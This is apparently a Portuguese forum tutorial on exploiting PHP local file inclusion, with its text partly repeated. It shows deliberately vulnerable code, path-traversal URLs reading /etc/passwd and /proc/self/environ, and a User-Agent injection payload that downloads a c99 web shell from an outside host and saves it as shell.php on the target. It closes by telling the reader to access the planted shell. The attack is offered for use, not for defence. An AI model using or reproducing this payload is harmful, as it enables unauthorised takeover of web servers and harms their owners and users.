Vamos lá.
Primeiro vou mostra um exemplo de código vulnerável:
é vulnerável por que o $redirect não está higienizado, portanto o include($redirect); irá ler diretamente de $_GET[page];
Um exemplo de URL vulnerável.
para checar se é vulnerável a upload checamos o seguinte arquivo
se tiver algo parecido com DOCUMENT_ROOT="blalblablablabla" é vulnerável.
agora vamos precisar do tamper data, vamos lá.
inicie o tamper data, e recarregue a página, e altere o user-agent para o seguinte código
Caso você tenha outra shell upada em outro lugar em txt pode modificar a url pré definida.
Pronto, é só acessar sua shell >
<.
Buh bye !
Primeiro vou mostra um exemplo de código vulnerável:
Código PHP:
<?php
// Código vulnerável a LFI
$redirect = $_GET['redirect'];
include($redirect);
?>
Um exemplo de URL vulnerável.
Código HTML:
http://www.example.com/redirect.php?page=../../../etc/passwd
Código HTML:
http://www.example.com/redirect.php?page=../../../proc/self/environ
agora vamos precisar do tamper data, vamos lá.
inicie o tamper data, e recarregue a página, e altere o user-agent para o seguinte código
Código PHP:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.5njr.com/shells/c99.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
Pronto, é só acessar sua shell >
Código HTML:
www.example.com/shell.php
Buh bye !
Comment